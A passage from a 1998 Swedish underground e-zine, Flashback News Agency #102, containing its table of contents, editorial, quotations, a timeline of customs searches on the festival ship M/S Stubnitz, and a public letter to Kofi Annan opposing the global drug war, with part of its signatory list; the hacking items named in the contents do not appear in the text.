* * * * * * * * * * * * * * * * * * * F L A S H B A C K N E W S A G E N C Y # 1 0 2 Vol.4 No.7 | 10 Juni 1998 Antal Prenumeranter : 48.720 (+122) You Are What You Know - You Are What You Do - Help Yourself No More Secrets - No More Excuses - No More Limits Redaktör: Jan Axelsson * * * * * * * * * * * * * * * * * * * Flashback News Agency 4.07: =========================== 01.......Ledare............................................................. 02.......Tänkvärda citat.................................................... d r o g e r & d r o g k u l t u r : 03.......M/S Stubnitz vs. Svensk Knarkhysteri 98............................ 04.......Public Letter to Kofi Annan........................................ 05.......Drogtester allt vanligare på arbetsplatser......................... h a c k i n g / c o m p u t e r u n d e r g r o u n d / i t : 06.......Tha Evil Felia Fuckers iNC presenterar Veckans hackade Telia sidor 07.......Porrbild på kungen som naken kvinna upprör KTH.................... 08.......Internet dom i Tyskland får kritik................................ 09.......Hackers stal data om bomber....................................... 10.......Telia Nemesis v.1.4 släpps 20 juni................................ 11.......Källkoden (Visual Basic) för Telia Nemesis........................ 12.......Farlig ICQ floodare............................................... 13.......Anonymitets servern Zoom läggs ned................................ p o l i t i k & t e r r o r i s m : 14.......Invandrare dömd för hitlerhälsning................................ f l a s h b a c k : 15.......Flashback Foundation.............................................. 16.......Flashback Logo in ascii........................................... 17.......Viktig information angående Flashbacks mailinglistor.............. 18.......Nyheter på Flashbacks hemsida..................................... 19.......FNA-boken sålde slut samma dag.................................... r e l i g i on / f i l o s o f i / k o n s p i r a t i o n : 20.......Gud till salu: kristendomen en miljardindustri.................... 21.......Intervju med J. Sonesson (satanist & grundare av Belial Center)... n o t i s e r / ö v r i g t : 22.......Falska entréband till Hultsfreds Festivalen till salu............. 23.......Platsannons: Bödel sökes.......................................... 24.......Frågor & svar...................................................... i. är det olagligt att sprida serie nummer? ii. re: vilka regler gäller ang. mp3? 25.......Feedback........................................................... i. re: 57 miljoner e-mail adresser säljes för 750kr ii. re: citat iii. re: icq iv. re: folkmord i profitens tecken v. passwords 26.......Svarta Börsen...................................................... i. säljes ii. köpes iii. bytes iv. övrigt 27.......Links to the Underground........................................... 28.......Smått & gott....................................................... __________________________________________________________________________ m e d a r b e t a r e / b i d r a g s g i v a r e | f n a # 1 0 2 : Anonym @ #020.se, bluefish, Calle, Cerial Phreak, CY£Uß, Dr Shaddack, GREN, Jonas Hansson, Aron Håkanson, Janos, Lars, Mattias, Mats, Micke, Morot, Powered By Will, Pelle Rylander, Sluggo, Spam King?, tEFF Crew, Johan Zandin m e d f l e r a . . . __________________________________________________________________________ 1. LEDARE | 980610 ================ Jodå, nu börjar FNA´s utgivningstakt att återgå till det normala. Det är inte ens en vecka sedan förra FNA kom, och förhoppningsvis kommer nästa FNA redan nästa vecka. Vi får väl se hur länge denna utgivningstakt håller i sig. Det beror ju framförallt på hur pass flitiga ni som läsare är. I övrigt läggs det upp en mängd olika saker på Flashbacks hemsida nu. Så mycket att jag valt att uppmärksamma detta i ett eget stycke längre fram. Jan Axelsson jan.axelsson@flashback.se __________________________________________________________________________ 2. TÄNKVÄRDA CITAT ========================== "Nazismens politiska farlighet ligger i dess förmåga att provocera hedervärda demokrater till att inskränka demokratiska rättigheter. Det är som om en del demokrater inte trodde på demokratins förmåga att försvara sig med blanka vapen (åsiktsfrihet, yttrandefrihet) utan måste ta till motståndarens (åsiktsregistrering, förbud för vissa yttranden). Vem står då som vinnare?" - Per Nygren "Det utmärkande för den skada som vållas genom att man undertrycker en åsikt ligger däri att man sålunda begår en stöld från mänskligheten, från de efterkommande såväl som från de nu levande, från de som avviker från åsikten ännu mer än från de som hyser den. Om åsikten är riktig berövas de möjligheten att utbyta villfarelsen mot sanningen. Är den oriktig går de miste om en nästan lika stor förmån, nämligen den klarare insikt om och åskådligare bild av sanningen, som uppkommer då denna konfronteras med villfarelsen." - John Stuart Mill "Cautious, careful people, always casting about to preserve their reputation and social standing, can never bring about a reform." - Susan B Anthony "En fullkomlig nyhet, alltså något som inte hänt förut, nån gång, vars episka mönster är helt okänt, skulle troligen inte komma in i en tidning. Den skulle inte gå att känna igen, och troligen inte att återge. Definitionen på en nyhet är nämligen inte att den aldrig hänt förut, utan att den hänt så många gånger förut att man omedelbart känner igen den som en nyhet." - Anders Enmark "If men reach the point of losing respect for property, everyone will have property, as all slaves become free men as soon as they no longer respect their master as master." - Max Stirner "No kind of sensation is keener and more active than that of pain; its impressions are unmistakable." - DAF de Sade "Sabotage will set us free throw a rock in the machine..." - Dennis Lyxzén (Refused) [Bidragsgivare: Mats, Morot & Johan Zandin] Tänkvärda citat bör du skicka till: fna@flashback.se __________________________________________________________________________ > > > D R O G E R & D R O G K U L T U R < < < __________________________________________________________________________ 3. M/S STUBNITZ VS. SVENSK KNARKHYSTERI 98 ========================== Händelseförlopp M/S Stubnitz 97/98 Juni 97: The Nursery inkommer med programförslag till KHS´98 som innefattar ett engagemang av den tyska båten M/S Stubnitz. Sommaren 97: Vi jobbar tillsammans med The Nursery för att undersöka möjligheterna till och kostnaderna det skulle innebära att ta hit M/S Stubnitz. September 97: Jag åker ner till M/S Stubnitz i Rostock tillsammans med två representanter från The Nursery för att bilda mig en uppfattning om fartyget samt programmet som läggs ombord. 26 September 97: Ett ´letter of intent´ skickas till M/S Stubnitz där KHS´98 bjuder in fartyget att ingå i KHS´98s program sommaren 98 som plattform för den experimentella musik The Nursery kommer presentera under sin musikfestival ´The Nursery Injection´. Hösten 97: Fortsatta förhandlingar med M/S Stubnitz samt föreningen The Nursery. November 97: första kontakten med Stockholms Hamn knyts (Jarl Kjellegård) som får projektet presenterat för sig och som åtar sig att leta efter en passande kajplats för M/S Stubnitz i Stockholm. 11 december 97: Vi blir tilldelade kajplats 161, Stadsgården, för fartyget. 26 januari 98: Ett brev kommer från kulturministeriet i Mecklenburg-Vorpommern som lyckönskar projektet. Februari 98: Fyra medlemmar från fartyget besöker Stockholm samt riktlinjer för projektet spikas. Mars 98: Alkoholinspektionen(Tove Larsson och Birgitta Holm) kontaktas för att undersöka möjligheterna för M/S Stubnitz att importera tyskt öl för försäljning ombord. Då detta är ett såpass unikt fall kan de inte fatta beslut i frågan(möjligheten till ett prejudikat diskuterades, men de ansåg inte frågan vara av såpass stor dignitet). Då kontaktas Tullverket och frågan ställs till dem om hur man skall gå till väga. Vad beträffar ölen så diskuteras möjligheterna och rådet är att ´inte väcka den björn som sover´ då detta fall är så pass unikt(tyvärr saknas uppgift om vem på Tullverket som rådde mig, men det var en av deras jurister). Ingen övrig information gavs vad beträffar förfarandet av Tullen när M/S Stubnitz skulle komma. Sjöfartsverket i Norrköping kontaktas(Christer Ingelsten) som rådfrågas om förfarandet vid fartygsbesök i Sverige. Beskedet var att så länge M/S Stubnitz hade giltiga tyska papper behövdes inga svenska tillstånd. Första kontakten med Brandskyddsmyndigheten(Sven Sandberg) togs för att kunna planera möjliga åtgärder. April 98: Brandinspektör Sven Sandberg reser till Rostock för att besiktiga skeppet samt planera för möjliga åtgärder. Beslut fattas hos KHS´98 att genomföra projektet samt att anställa en producent för programläggningen ombord. M/S Stubnitz tar kontakt med en bekant som importerar öl till Sverige som ger dem tillstånd att importera ölen på sitt importtillstånd. Särskilda skattekontoret i Ludvika(Ann-Katrin Andersson)kontaktas för att utröna hur alkoholskatten skall betalas. De lämnar beskedet att när ölen förtullats skall det redovisas till dem och alkoholskatten betalas(1.47*procent*antal liter). Kontakten upprätthålls med Stockholms Hamn som informerar om alla turer som behövs ta i beaktande vid fartygets ankomst till Stockholm(berättar dock inget om rapporteringsskyldighet till Tullen 48 timmar innan ankomst). Maj 98: Producent anställs (Fredrik Norberg) som reser ner till M/S Stubnitz för att träffa besättningen samt planera program ombord. Polisen(Björn Ericsson) kontaktas och tillstånd söks för att bedriva musiktillställningar, dansevenemang samt teaterföreställningar ombord. Stockholms resursförvaltning, Tillsdånsmyndigheten(Anna Grönblad) tillstånd söks för alkoholutskänkning. Besked kommer från M/S Stubnitz att man måste skjuta upp avfärd från Rostock till den 27 maj då alla inspektioner ej är klara. Resan beräknas ta 50 timmar från Rostock till Stockholm. 25 maj 98: Inbjudan skickas till pressen att närvara vid invigning av fartyget den 31 maj. 26 maj 98: Trafikledningen på Stockholms Hamn kontaktas och informeras om läget. 27 maj 98: Sista besiktningen utförs på öppet vatten av fartyget och allt godkänns. 28 maj 98 Intygen från tyska sjöfartsministeriet dröjer och medlemmar ur besättningen reser till Hamburg för att skynda på processen samt kontakt tas med Sjöfartsverket i Norrköping som ombeds utfärda ett tillfälligt internationellt transitintyg som ger fartyget rätt att resa mot Stockholm innan intygen från Hamburg kommer. 29 maj 98: Resan påbörjas klockan 08.00 och fartyget lämnar Rostock. 30 maj 98: M/S Stubnitz ringer och berättar att en packning gått sönder och att de inte kan gå med full fart. Söndagkvällens arrangemang ställs in. 31 maj 98: Klockan 15.00 anländer M/S Stubnitz till Landsort och tar ombord lots. Klockan 20.30 angör M/S Stubnitz Kajplats 161, Stadsgården. Jourhavande hamnstyrman(Sven Kirs) finns på plats och ser till att förtöjningen går rätt till. Alla på plats ställer sig frågande till varför inte Tullen finns på plats. 1 juni 98: Tullen besöker skeppet och går igenom hela skeppet med hundar och manskap. De påträffar ett gram hasch och ett par karatepinnar samt en burk tårgasspray. Tullen beslagtar fem flaskor ”hampa öl”, 3.3 gram svamp samt grönt the för provtagning. Ombord finns även 200 tunnor öl (Rostocker Pils) som deklareras.Tullen utför även en klarering av skeppet och bötfäller(900:-) dem för att de inte föranmält sin ankomst senast 48 timmar innan ankomst. Boten betalas på plats kontant. The Nursery har en sluten tillställning på kvällen. 2 juni 98: Särskilda skattekontoret i Ludvika kontaktas och de faxar över blanketter för leverensanmälan. Brandsyn utförs av Sven Sandberg som godkänner fartyget för 300 besökare under däck. Tullen genomsöker fartyget på nytt och hittar denna gång fyra gram hasch, en butterflykniv och en elpistol. Sjöfartsverket besöker fartyget och gör en snabbbesiktning, fartyget godkänds. 3 juni: Besked från tullmyndigheten att ´hampa ölen´ ej innehöll narkotika. Tullens granskning av M/S Stubnitz är slutförd. Jacob Broms program secretary music Stockholm-Cultural Capital of Europe 1998 Nursery har en egen hemsida. URL: http://www.flashback.net/~nursery/ __________________________________________________________________________ 4. PUBLIC LETTER TO KOFI ANNAN ========================== Public Letter to Kofi Annan June 1, 1998 Mr. Kofi Annan Secretary General United Nations New York, New York United States Dear Secretary General, On the occasion of the United Nations General Assembly Special Session on Drugs in New York on June 8-10, 1998, we seek your leadership in stimulating a frank and honest evaluation of global drug control efforts. We are all deeply concerned about the threat that drugs pose to our children, our fellow citizens and our societies. There is no choice but to work together, both within our countries and across borders, to reduce the harms associated with drugs. The United Nations has a legitimate and important role to play in this regard -- but only if it is willing to ask and address tough questions about the success or failure of its efforts. We believe that the global war on drugs is now causing more harm than drug abuse itself. Every decade the United Nations adopts new international conventions, focused largely on criminalization and punishment, that restrict the ability of individual nations to devise effective solutions to local drug problems. Every year governments enact more punitive and costly drug control measures. Every day politicians endorse harsher new drug war strategies. What is the result? U.N. agencies estimate the annual revenue generated by the illegal drug industry at $400 billion, or the equivalent of roughly eight per cent of total international trade. This industry has empowered organized criminals, corrupted governments at all levels, eroded internal security, stimulated violence, and distorted both economic markets and moral values. These are the consequences not of drug use per se, but of decades of failed and futile drug war policies. In many parts of the world, drug war politics impede public health efforts to stem the spread of HIV, hepatitis and other infectious diseases. Human rights are violated, environmental assaults perpetrated and prisons inundated with hundreds of thousands of drug law violators. Scarce resources better expended on health, education and economic development are squandered on ever more expensive interdiction efforts. Realistic proposals to reduce drug-related crime, disease and death are abandoned in favor of rhetorical proposals to create drug-free societies. Persisting in our current policies will only result in more drug abuse, more empowerment of drug markets and criminals, and more disease and suffering. Too often those who call for open debate, rigorous analysis of current policies, and serious consideration of alternatives are accused of "surrendering." But the true surrender is when fear and inertia combine to shut off debate, suppress critical analysis, and dismiss all alternatives to current policies. Mr. Secretary General, we appeal to you to initiate a truly open and honest dialogue regarding the future of global drug control policies - one in which fear, prejudice and punitive prohibitions yield to common sense, science, public health and human rights. Sincerely, ARGENTINA Graciela Fernandez Meijide Member of Congress Irma Fidela Parentella Member of Congress Gustavo Hurtado Coordinación Ejecutiva del Programa de Drogadependencia de la Ciudad de Buenos Aires Carlos Juan Moneta Permanent Secretary of the Latin American Economic System (SELA) Adolfo Perez Esquivel Nobel Laureate (Peace) Graciela TouzU President, Intercambios AUSTRALIA Dick Adams House of Representatives, National Parliament Lyn Allison Senator, National Parliament Peter Baume Former Cabinet Minister; Chancellor, Australian National University Kevin Berry Olympic Gold Medallist Ald. Pru Bonham Deputy Lord Mayor, Hobart Ted Bramble Lawyer, Civil Libertarian Peter Brooks Dean, Health Sciences, University of Queensland John Brumby Leader of the Opposition, Victoria Ita Buttrose Journalist, author John Cain Former Premier, Victoria Dr. Greg B. Chesher Pharmacologist Assoc. Prof. Macdonald J. Christie Department of Pharmacology, University of Sydney Peter Cleeland Former Politician Barney Cooney Senator from Victoria Dr. Nick Crofts Public researcher Paul Deany Executive Officer, Asian Harm Reduction Network Mary Delahunty Journalist Ivor Deverson Lord Mayor, Melbourne Bob Douglas Professor of Epidemiology, Australian National University Alex Dr. Wodak Physician Phillip Dunn QC Barrister Paul Ellercamp Journalist Peter Fritz Founder and Managing Director, TCG Group of Companies Dr. Peter Graham General Practitioner Randolph Griffiths Former Sydney City Councillor Sir Rubert Hamer Former Premier, Victoria Susan Irvine Senior Lecturer, Public Health Harry Jenkins House of Representatives, National Parliament Michael Kirby, AC CMG President, International Commission of Jurists Joan Kirner Former Premier, Victoria John Konrads Olympic Gold Medallist Professor Jara Krivanek Technical University of Ostrava Czech Republic Richard Larkins Chairman, National Health and Medical Research Council Steve Leeder Dean, Medical Faculty, Sydney University Helen Lochhead Architect Frank Merlino Mayor, City of Whittlesea David Penington Former Vice Chancellor, Melbourne University Ron Penny Professor of Immunology, University of New South Wales Bronwyn Pike Executive Officer, Evatt Centre Phil Puna Attorney Dr. Adrian Reynolds Robert Richter QC Barrister Leo Schofield Director, Sydney Festival Richard Smallwood Former President, Royal Australasian College of Physicians Dr. Nadia Solowij National Drug & Alcohol Research Centre, University of NSW John Spatchurst Principal, Spatchurst Design Associates Bill Stronach Australian Drug Foundation Kelvin Templeton Sportsman and Sports Administrator Charles Watson Dean Health Sciences Curtin University David White Former Politician Michael Willesee TV Broadcaster Charles Williams Dean of Law, Monash University Neville Wran Former Premier, New South Wales BELGIUM Yves Cartuyvels Professor of Penal Law, University of Saint-Louis, Brussels Stanley Crossick Chairman, European Policy Centre Vincent Decroly Member of Parliament, Brussels Christine Guillain Attorney, Researcher, School of the Criminological Sciences, Free University of Brussels Dan Kaminski School of Criminology, Catholic University of Louvain-la-Neuve Philippe Mary Professor of Criminology, Vice-President, School of Crimininological Sciences, Free University of Brussels Patrick Moriau University of Brussels Member of Parliament, Mayor of Chapelle-lez-Herlaimont Ilya Prigogyne Emeritus professor physical chemistry, Free University of Brussels; Nobel Laureate (Chemistry, 1977) Olivier Ralet Former head, PEDDRO drug prevention project, UNESCO/European Union Micheline Roelandt Psychiatrist Sonja Snacken Ph.D., Professor of Criminology and Sociology of Law, Free University of Brussels Isabelle Stengers Philosopher, Free University of Brussels; Winner "Grand Prix de Philosophie de L´Académie Française Lode Van Outrive Emeritus Professor of Criminology, Leuven University; Former Member of the European Parliament BOLIVIA Antonio Aranibar Quiroga Former Foreign Minister Edgar Camacho Omiste Former Ambassador to the OAS Roger Cortez-Hurtado Former Member of Congress Juan del Granado Member of Congress Alfonso Ferrufino Valderrama Former Vice-President of the Bolivian House of Representatives Horst Grebe Lopez Former Cabinet Minister Lidya Gueiler Tejada Former President of Bolivia Roberto Moscoso Valderrama Member of Congress Ricardo Paz Ballivian Former Member of Congress Carlos Julio Quiroga Blanco Member of Congress Guillermo Richter A. Former Senator Gonzalo Ruiz Member of Congress Manuel Suarez Avila Member of Congress Felix Vasquez Mamani Member of Congress BRAZIL Ana Magnólia Bezerrá Mendés Assistant Professor, University of Brasilia Pedro Casaldaliga Catholic Bishop of São Felix do Araquaia Luiz Inacio Lula Da Silva Presidential Candidate, Brazil; Honorary President of the Workers Party Fabio Mesquita Researcher, University of São Paulo, Brasil; Executive Director of the Latin American Harm Reduction Network CANADA Glenn A. Gilmour Lawyer, Ottawa James A. Wakeford AIDS Activist, Toronto Frank Addario Criminal Lawyer Chris Axworthy Member of Parliament, Saskatoon, Saskatchewan Marie-Andrée Bertrand Professor Emeritus of Criminology, University of Montreal; President, International Antiprohibitionist League, Montreal, Quebec Barry L. Beyerstein, Ph.D. Brain Behavior Laboratory, Simon Fraser University Barry L. Beyerstein, PhD Brain Behavior Laboratory, Department of Psychology, Simon Fraser University, Burnaby, B.C. Neil Boyd Professor, School of Criminology, Simon Fraser University, Vancouver J.A. Browne Parent, Burlington, Ontario C. Michael Bryan Formerly Special Assistant, Commission of Inquiry into the Non-Mecial Use of Drugs (Le Dain Commission); Senior Policy Analyst (Narcotic Control Policy), Health Protection Branch, Health Canada Paul Burstein Criminal Lawyer Sharon Carstairs Senator, former Chair, Standing Senate Committee on Legal and Constitutional Affairs, Sente of Canada John W. Conroy Barrister & Solicitor, Mission , B.C. Paul Copeland Lawyer; Columnist on Drug Law, Ontario Criminal Lawyers´ Association Newsletter, Toronto Laura Cowan, RN Executive Director of Street Health, Toronto, Ontario Libby Davies Member of Parliament, Vancouver-East Jonathan Dawe Barrister, Toronto, Ontario Denise De Pape Bev Desjarlais Member of Parliament, Manitoba Marion Dewar HAIA Oxfam Canada, Ottawa Jari Dvorek Medical Marijuana Activist, Toronto Richard Elliott President, Canadian HIV/AIDS Legal Network, Toronto Patricia G. Erickson, PhD Senior Scientist, Addiction Research Foundation, Division of the Addiction and Mental Health Services Corporation, Professor of Sociology, University of Toronto Michael Farrance Addictions Coordinator, City of Toronto Hostels Division, Toronto Yvon Godin Member of Parliament, Bathhurst, NB Irene Goldstone B.C. Centre for Excellence in HIV/AIDS, Vancouver Dr. Richard Gould Community Medicine Specialist, Toronto Edward L. Greenspan, QC Senior Partner, Greenspan, Nenein & White, Toronto Catherine Hankins Public Health Epidemiologist, Chair of the Canadian Task Force on HIV and Injection Drug Use, Montreal David Harvey Oakville, Ontario Shaun Hopkins Manager, The Works Andrew J. Rapoch Former President, National Organization for the Reform of the Marijuana Laws (NORML), Ottawa, Ontario Jane Jacobs Author Ralf Jorgens Executive Director, Canadian HIV/AIDS, Legal Network, Montreal J. Robertt. Kellerman Law Union of Ontario, Steering Committee Perry Kendall Former president, Addiction Research Foundation, Victoria Rick Laliberte Member of Parliament, Churchill River, Beauval, Saskatchewan Pierre Landreville Professer of Criminology, University of Montreal Wendy Lill Member of Parliament, Dartmouth Dennis Long President, Ontario Federation of Community Addictions and Mental Health Programs; Executive Director, Breakaway Substance Abuse Treatment Centre, Toronto, Ontario Paul MacPhee Co-Chair AIDS Action Now!, Toronto, Ontario Peter Mancini Member or Parliament Ron Mann Filmmaker, Toronto Patrick Martin Member of Parliament, Winnipeg, Manitoba Vishnu Mathur T.V. Producer, Toronto Alexa McDonough Member of Parliament, Federal Leader of New Democratic Party, Ottawa, Canada Ruth Morris Education Director, Toronto Lorne Nystrom Member of Parliament, N.D.P., Qu´Appelle, Regina, Saskatchewan Eugene Oscapella Lawyer, former Chair, Law Reform Commission of Canada Drug Policy George Panagpa F.U.M Group - Parkdale Comunity Health Center John C. Polanyi Nobel Laureate (Chemistry, 1986), Toronto, Ontario Gil Puder Police Officer, Abbotsford, BC Diane Riley, PhD International Harm Reduction Association, Toronto Svend Robinson Member of Parliament, New Democratic Party of Canada, Burnaby-Douglas Greg Robinson Co-Chair AIDS Action Now!, Toronto Dr. David Roy Director, Centre for Bioethics, Clinical Research Institute of Montreal Clayton Ruby Lawyer, Toronto Gordon S. Earle Member of Parliament, Halifax, Nova Scotia Dr. John S. Millar Provincial Health Officer, Ministry of Health and Ministry Responsible for Seniors, Victoria, British Columbia Pat Sanagan Substance Abuse Prevention Consultant Jan Skirrow Consultant; Former CEO Alberta Alcohol & Drug Abuse Commission; Deputy Minister of Community and Occupational Health, Alberta; Founding CEO Canadian Centre on Substance Abuse, Duncan, BC Robert St-Pierre HIV Program Coordinator, Canadian Hemophilia Society, Montreal Terence Stewart Canadian Aids Society, Ottawa Peter Stoffer Member of Parliament - New Democratic Party of Canada Neev Tapiero Medical Cannabis Activist and Dispenser, Toronto Jeannette Tossounian MUM (Marijuana Used for Medicine), Kitchener, Ontario Elaine Vautour Counsellor, Toronto, Ontario Judy Wasylycia-Leis Member of Parliament, Winnipeg Dr. Jonathan Wouk Ottawa, Ontario CHILE Ariel Dorfman Writer CHINA Spencer So Community Drug Advisory Council COLOMBIA Arturo Alape Writer Gustavo Alvarez Gardeazabal Governor, Department of Valle de Cauca Belisario Betancur Former President Juan Manuel Santos President, Fundacion Buen Gobierno Alvaro Mutis Writer Augusto Ramirez Ocampo Former Foreign Minister; National Recociliation Commission COSTA RICA Oscar Arias Nobel Laureate (Peace); Former President of Costa Rica DENMARK Hans Henrik Brydensholt High Court Judge, Former Director of the Danish Prison and Probation Service, Former Head of Section in the Danish Ministry of Justice Bjørn Elmquist Former Member of Parliament and Chairman of Parliamentary Permanent Committee on Justice Jørgen Jepsen Centre of Alcohol & Drug Research, University of Aarhus Erik Merlung District Attorney, Copenhagen Erling Olsen Former Minister of Justice, Former Chairman of the Danish Parliament, Former Professor of Economics at the University of Copenhagen Villy Søvndal Member of Parliament, Chairman of the Permanent Parliamentary Committee on Social Affairs ECUADOR Washington Herrera Former Presidential Minister FINLAND Inkeri Anttila Professor of Penal Law, University of Helsinki; Former Minister of Justice Kauko Aromaa Research Director, National Research Institute of Legal Policy Pekka Koskinen Professor of Penal Law, University of Helsinki Klaus Maekelae Research Director, Finnish Foundation for Alcohol Studies Hannu Takala Executive Secretary, National Council for Crime Prevention Patrik Tornudd Former Director of National Research Institute of Legal Policy FRANCE Claude Aiguevive, MD Vice President, Médecins du Monde Josefina Alvarez Research Group on Criminal Policy, University of Montpellier I Bruno Aubusson de Cavarlay Research Engineer, Guyancourt Dr. Elisbeth Avril Médecins du Monde Michèle Barzach Former Minister of Health Georges Berthoin International Honarary Chairman of the European Movement, Paris France Mario Bettati Professor of International Law, Paris University Francis Caballero Professor of Law, Paris University Jean-Pierre Changeux Professor of Molecular Neurobiology, Pasteur Institute and College de France Anne Coppel Sociologist Claude Faugeron Research Director, Co-Director, CNRS Drug Research Group, Paris Andre Glucksman Philosopher Marek Halter Writer Michel Kazatchkine Professor of Immunology, Paris University Catherine Lalumiere MPE (Member of the European Parliament) Jacques Lebas, MD President, Institut de l´Humanitaire, Paris Bertrand Lebeau Head Centre Parmentier Paris Thierry Levy Attorney William Lowenstein, MD Head, Montecristo Center, Paris Jacky Mamou President, Médecins de Monde Arnaud Marty Lavauzelle President, AIDES Monique Nahas Professor, University of Paris VIII GERMANY Lorenz Böllinger Professor of Law, University of Bremen Daniel Cohn-Bendit Member, European Parliament; Commission for Civil Rights and Internal Affairs Barbara Duden Professor of Historical Sociology, Hannover, Germany Peter Frerichs Vice President, Frankfurt Police Prof. Dr. Monika Frommel Criminal Law, School of Criminology, University of Kiel Günter Grass Writer Prof. Dr. Axel Grönemeyer Center for Social Problems, Public Health and Social Policy, University of Bielefeld Johannes Gross Journalist, Author, Talk show host, former editor "Capital" Prof. Dr. Bernhard Haffke Criminal Law, University of Passau Ivan Illich Philosopher Dr. Hans Harald Koerner Public Prosecutor, Frankfurt Leutheuser-Schnarrenberger Former German Federal Minister of Justice, drug political speaker, FDP Party Sabine Leutheusser-Schnarrenberger Former German Federal Minister of Justice Heide Moser Minister of Employment and Social Affairs, State of Schleswig-Holstein Prof. Dr. Cornelius Nestler University of Köln Margarethe Nimsch Former Minister for Health, State of Hessen, Germany Prof. Dr. Cornelius Prittwitz Criminal Law, University of Rostock Prof. Dr. Stephan Quensel Professor of Sociology, University of Bremen Prof. Dr. Sebastian Scheerer Aufbau- und Kontaktstudium Kriminologie, University of Hamburg Prof. Dr. Konrad Schily President, University of Witten-Herdecke Hartmut Schneider District Court Judge, Lübeck Dierk-Henning Schnitzler Police President, City of Bonn, Christian Democrate GREECE Alexis Grivas Foreign Correspondent El Sol de Mexico Daily Nicos Mouzelis Professor of Sociology, London School of Economics, Athens Nocis Papadakis Press Counsellor, Greek Embassy in London George Papandreou Alternate Foreign Minister of Greece Michaelis Papayannakis Member European Parliament Anthony D. Papayannides Journalist, Publisher James Pettifer Visiting Professor, Institute of Balkan Studies, University of Thessaloniki Voula Tsinorema Professor of Philosophy, University of Ioannina Georgos Votsis Political Editor, Eleftherotypia Newpaper, Athens GUATEMALA Arnaldo Ortiz Moscoso Former President of the Bar Association, Guatemala HUNGARY Jánes Kis Philosopher INDIA Jimmy Dorabjee Program Manager, Society for Serving the Urban Poor, New Delhi IRELAND Ivana Bacik Reid Professor of Criminal Law, Trinity College, Dublin Vincent Browne Journalist; Lawyer Tim Murphy Lecturer in Law, University College, Cork Daire O´Brien Editor, Himself Magazine Olaf Paul Tyaransen Writer ISREAL Yossi Beilin Former Minister, Member of Knesset, Tel Aviv Haim Cohn Former Deputy President of the Israel Supreme Court, Professor of Penal Philosophy Prof. Ruth Gavison Haim Cohn Professor of Human Rights, Hebrew University; President of the Israel Civil Rights Association; Member, International Commission of Jurists Menachem Horovitz Former Director of Correctional Services, Department of Welfare and Labour; Research and Teaching Associate, Institute of Criminology, Hebrew University Leslie Sebba, JD Associate Professor, Law Faculty, Hebrew University; former Chairperson of the Criminology Council. ITALY Vittorio Agnoletto President of the Italian League Against AIDS Monica Bettoni-Brandani Undersecretary of State for Health Giovanni Bollea Professor of Neuropsychiatry, University of Rome Emma Bonino European Commissioner for Humanitarian Affairs Nicoletta Braschi Actress Francesco Carella President Health Commission of the Senate Don Luigi Ciotti President, Gruppo Abele, Torino Dario Fo Nobel Laureate (Literature 1997) Luigi Manconi Senator, President of the Green Party, Rome Livio Pepino President, Magistratura Democratica Giuliano Pisapia President, Justice Commission, Italian Parliament, Rome Franca Rame Actress Stefano Rodota President, Authority for Privacy Ersilia Salvato Vice-President, Senate, Rome Grazia Zuffa President, Forum Droghe; Former Member of Parliament, Florence JAMAICA Colonel (R) Trevor N.N. MacMillan, C.D.J.P. Former Commissioner of Police, Jamaica Constabulary Force; Former Director, Revenue Protection Division, Ministry of Finance LUXEMBOURG Renée Wagner Member of Parliament, Luxemburg; President of the Green Party; Member, Special Parliamentary Commssion on Drugs MALAYSIA Susan Chong Malaysian AIDS Council Hisham Hussein Malaysian AIDS Council G. Chacko Vadaketh Chair, Law and Ethics Committee, Malaysian AIDS Council; Advocate and Solicitor, Kuala Lumpur MEXICO Mariclare Acosta President of the Mexican Comission for the Defense and Promotion of Human Rights (CMDPDH) Homero Aridjis President, International Organization of Literary Writers & Editors Carlos Heredia Zubieta Member of Congress Gilberto Lopez y Rivas Member of Congress Jesus Silva Herzog Former Mexican Ambassador to the United States NETHERLANDS Andreas van Agt Former Prime Minister of the Netherlands; Former Minister of Justice; Former Ambassador of the European Union to the United States Janhuib Blans Head of Jellinek Prevention; Assistant Professor of Parent Education and Prevention, University of Amsterdam Tim Boekhout van Solinge Centre for Drug Research, University of Amsterdam Frank Bovenkerk Professor of criminology, University of Utrecht Giel van Brussel MPH Master Public Health, Amsterdam Dr. Peter D.A. Cohen Centre for Drug Research, University of Amsterdam Hedy d´Ancona Former Dutch Minister of Welfare, Health, and Culture; Member of the European Parliament Marcel van Dam Publicist, Former Minister of Housing and Physical Planning, Putten, Netherlands Dr. Peter A. de Groot Psychiatrist, Harderwijk Jan F. Glastra van Loon Professor, Senator, Former State Secretary of Justice John Griffiths Professor of Sociology of Law, University of Groningen Sylvia van ´t Hul Public Prosecutor, Rotterdam Louk Hulsman Emeritus professor of Penal Law and Criminology, Erasmus University, Rotterdam; Former President, European Commission for Criminal Problems, Coucil of Europe Constantijn Kelk, Ph.D. Professor, Director, Willem Pompe Institute for Criminal Sciences, Utrecht University Free le Poole Member of the First Chamber of Parliament (Senate), Vice-President, District Court, Assen Ed Leuw Researcher at the Ministry of Justice, The Hague Freek Polak Psychiatrist, Amsterdam Felix Rottenberg Amsterdam Frits C.F. Rüter Professor of Criminal Law, University of Amsterdam E.H. Schuyer Senator; Chairman of Democrats (D66), Senate Jan G. van der Tas Former Netherlands Ambassador to Germany Ed. van Thijn Former Mayor of Amsterdam; Professor, University of Amsterdam J.M. vander Vaart Judge, District Court of Amsterdam Leon Wever Board Member, Symbion (Addiction Care Rotterdam Region, Rijnmond); Former Deputy Chief of Addiction Care, Ministry of Health Dr. Pieter Winsemius Former Netherlands Minister of Housing, Physical Planning and Environment Policy NEW ZEALAND Tim Barnett Member of Parliament, New Zealand NICARAGUA Violeta Barrios de Chamorro Former President of Nicaragua Miguel d´Escoto Brockman Former Foreign Minister; Fundeci Nicaraguan Foundation for Comprehensive Community Development Xabier Gorostiaga Former Rector, University of Central America NORWAY Johannes Andenaes Professor of Penal Law; Former Rector, University of Oslo; Former Chairman, Permanent Penal Committee of Norway Anders Bratholm Professor of Penal Law, University of Oslo Nils Christie Professor of Criminology, University of Oslo, Former director of Scandinavian Board of Criminology Gunnar Garbo Ambassador; Former Member of Parliament Ragnar Hauge Professor, Former Director, State Institute of Alcohol and Drug Research Cecilie Hoigaard Professor of Criminology, University of Oslo, Former Director, Scandinavian Board of Criminology Thomas Mathiesen Professor of Sociology of Law, University of Oslo Sturla Nordlund Director, Norwegian State Institute of Alcohol and Drug Research PERU Javier Alva Orlandini Member of Congress Rolando Ames Former Senator Humberto Campodonico Economist, University Professor (San Marcos) Arturo Castillo Chirinos Member of Congress Julio Cotler Director, Institute of Peruvian Studies Javier Diez Canseco Member of Congress Fernando Eguren Sociologist, Director of Quarterly 